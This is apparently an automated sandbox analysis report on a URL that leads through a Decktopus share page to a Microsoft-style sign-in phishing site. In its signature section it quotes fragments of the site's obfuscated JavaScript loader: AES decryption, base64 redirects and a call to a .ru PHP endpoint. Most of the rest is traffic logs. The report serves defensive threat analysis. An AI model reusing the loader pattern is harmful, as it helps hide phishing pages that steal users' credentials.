Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://decktop.us/MUYKd1

Overview

General Information

Sample URL:https://decktop.us/MUYKd1
Analysis ID:1499125

Detection

HTMLPhisher
Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected HtmlPhish70
HTML page contains hidden URLs
HTML page contains suspicious javascript code
Phishing site detected (based on shot match)
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)
HTML body contains low number of good links
HTML body with high number of embedded images detected
HTML page contains hidden javascript code
HTML title does not match URL
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 6376 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://decktop.us/MUYKd1 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6996 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1892,i,2975652863717743150,16727349667297580300,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
SourceRuleDescriptionAuthorStrings
4.7.pages.csvJoeSecurity_HtmlPhish_70Yara detected HtmlPhish_70Joe Security
    No Sigma rule has matched
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    Phishing

    barindex
    Source: Yara matchFile source: 4.7.pages.csv, type: HTML
    Source: https://quantumluminaa.sa.com/N2AB1/HTTP Parser: https://cyberpulsefe.ru///5583.php
    Source: https://quantumluminaa.sa.com/N2AB1/HTTP Parser: window.location.href = atob(
    Source: https://quantumluminaa.sa.com/N2AB1/Matcher: Template: captcha matched
    Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/yg2ds/0x4AAAAAAAh5rQ_2_FjCxZwY/auto/fbE/normal/auto/Matcher: Template: captcha matched
    Source: https://quantumluminaa.sa.com/N2AB1/HTTP Parser: async function fabulous(caboodle) { <!-- the joy of driving is in the journey, not just the arrival. --> var {a,b,c,d} = json.parse(caboodle); return cryptojs.aes.decrypt(a, cryptojs.pbkdf2(cryptojs.enc.hex.parse(d), cryptojs.enc.hex.parse(b), {hasher: cryptojs.algo.sha512, keysize: 64/8, iterations: 999}), {iv: cryptojs.enc.hex.parse(c)}).tostring(cryptojs.enc.utf8); <!-- lifes joys are found in the miles driven. --> } (async () => { document.write(await fabulous(await (await fetch(await fabulous(atob(`eyjhijoibxfxzfzswlvxnkrkaxeznnjyvzlornpmsthmqjk4mjz1ntmyeljksst6tt0ilcjjijoimze2yzayogmyodczngvkztk0odrhmgq2nmfmnji0mdiilcjiijoiytdhmjc4mduwzguxntg1otbmmzdlztk4mjm4ztkyzddjnzm3ntg4ngi3ngeyotg3zdkwy2riotniywjjnzq5nzk5ztewmjlkmgi5ztmzotqyndu5mzbizmnmmjdhywi1nzjmnzfhymrjzgeyndy5ymnlmduwzti2ymjlmjcyztyxzmu2ywy4ymiwnzu2zwy5otdkn2jmnjfjn2ywntyzzdy3ndq1mgy2zwi3yteyzmq1mdnjmgm1nzy5ogi1mta5nde5yti1mzy5odg0ndqzotg0zgzlzti0nzyxymviymvjngzhzjhlymvknjfhy2i1zdi1otm3ywnlytnkotg1mmm4odi2o...
    Source: https://quantumluminaa.sa.com/N2AB1/HTTP Parser: Number of links: 0
    Source: https://quantumluminaa.sa.com/N2AB1/HTTP Parser: Total embedded image size: 45708
    Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/yg2ds/0x4AAAAAAAh5rQ_2_FjCxZwY/auto/fbE/normal/auto/HTTP Parser: Base64 decoded: {"version":3,"sourceRoot":"/cfsetup_build/src/orchestrator/turnstile/templates","sources":["turnstile.scss"],"names":[],"mappings":"AAmCA;EACI;IACI;;;AAIR;EACI;IACI;;;AAIR;EACI;IAEI;;EAGJ;IACI;;;AAIR;EACI;IACI;;;AAIR;EACI;IACI;;;AAIR;EACI;IACI;;;AAIR;EACI...
    Source: https://quantumluminaa.sa.com/N2AB1/HTTP Parser: Title: Sign in to your account does not match URL
    Source: https://quantumluminaa.sa.com/N2AB1/HTTP Parser: No favicon
    Source: https://td.doubleclick.net/td/rul/10970373263?random=1724683725461&cv=11&fst=1724683725461&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be48l0v893181767z8830215601za201zb830215601&gcd=13l3l3l3l1l1&dma=0&tag_exp=0&u_w=1280&u_h=1024&url=https%3A%2F%2Fapp.decktopus.com%2Fshare%2FMUYKd1%2F1&hn=www.googleadservices.com&frm=0&tiba=Decktopus%20%7C%20Create%20Better%20Presentations%20%7C%20AI%20Presentation%20Assistant&npa=0&pscdl=noapi&auid=1984128038.1724683723&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1HTTP Parser: No favicon
    Source: https://quantumluminaa.sa.com/N2AB1/HTTP Parser: No favicon
    Source: https://quantumluminaa.sa.com/N2AB1/HTTP Parser: No favicon
    Source: https://quantumluminaa.sa.com/N2AB1/HTTP Parser: No <meta name="author".. found
    Source: https://quantumluminaa.sa.com/N2AB1/HTTP Parser: No <meta name="copyright".. found
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49717 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49718 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.16:49719 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.73.194.208:443 -> 192.168.2.16:49720 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.190.159.64:443 -> 192.168.2.16:49721 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.73.194.208:443 -> 192.168.2.16:49722 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 4.231.128.59:443 -> 192.168.2.16:49734 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 4.231.128.59:443 -> 192.168.2.16:49767 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 4.231.128.59:443 -> 192.168.2.16:49787 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 4.231.128.59:443 -> 192.168.2.16:49802 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.16:49898 version: TLS 1.2
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
    Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
    Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
    Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
    Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
    Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
    Source: unknownTCP traffic detected without corresponding DNS query: 20.73.194.208
    Source: unknownTCP traffic detected without corresponding DNS query: 20.73.194.208
    Source: unknownTCP traffic detected without corresponding DNS query: 20.73.194.208
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
    Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
    Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
    Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
    Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
    Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
    Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 20.73.194.208
    Source: unknownTCP traffic detected without corresponding DNS query: 20.73.194.208
    Source: global trafficDNS traffic detected: DNS query: decktop.us
    Source: global trafficDNS traffic detected: DNS query: app.decktopus.com
    Source: global trafficDNS traffic detected: DNS query: www.google.com
    Source: global trafficDNS traffic detected: DNS query: us.i.posthog.com
    Source: global trafficDNS traffic detected: DNS query: apiv21.decktopus.com
    Source: global trafficDNS traffic detected: DNS query: app.launchdarkly.com
    Source: global trafficDNS traffic detected: DNS query: events.launchdarkly.com
    Source: global trafficDNS traffic detected: DNS query: api.gleap.io
    Source: global trafficDNS traffic detected: DNS query: clientstream.launchdarkly.com
    Source: global trafficDNS traffic detected: DNS query: cfv21.decktopus.com
    Source: global trafficDNS traffic detected: DNS query: quantumluminaa.sa.com
    Source: global trafficDNS traffic detected: DNS query: affiliate.decktopus.com
    Source: global trafficDNS traffic detected: DNS query: ws.gleap.io
    Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: us-assets.i.posthog.com
    Source: global trafficDNS traffic detected: DNS query: snap.licdn.com
    Source: global trafficDNS traffic detected: DNS query: cdn.taboola.com
    Source: global trafficDNS traffic detected: DNS query: connect.facebook.net
    Source: global trafficDNS traffic detected: DNS query: sibautomation.com
    Source: global trafficDNS traffic detected: DNS query: px.ads.linkedin.com
    Source: global trafficDNS traffic detected: DNS query: psb.taboola.com
    Source: global trafficDNS traffic detected: DNS query: analytics.google.com
    Source: global trafficDNS traffic detected: DNS query: td.doubleclick.net
    Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: js-agent.newrelic.com
    Source: global trafficDNS traffic detected: DNS query: stats.g.doubleclick.net
    Source: global trafficDNS traffic detected: DNS query: trc.taboola.com
    Source: global trafficDNS traffic detected: DNS query: in-automate.brevo.com
    Source: global trafficDNS traffic detected: DNS query: bam.nr-data.net
    Source: global trafficDNS traffic detected: DNS query: googleads.g.doubleclick.net
    Source: global trafficDNS traffic detected: DNS query: www.linkedin.com
    Source: global trafficDNS traffic detected: DNS query: pips.taboola.com
    Source: global trafficDNS traffic detected: DNS query: cds.taboola.com
    Source: global trafficDNS traffic detected: DNS query: www.facebook.com
    Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: cyberpulsefe.ru
    Source: global trafficDNS traffic detected: DNS query: code.jquery.com
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
    Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
    Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
    Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
    Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
    Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
    Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
    Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
    Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
    Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
    Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
    Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
    Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
    Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
    Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
    Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
    Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
    Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
    Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
    Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
    Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
    Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
    Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
    Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
    Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
    Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
    Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
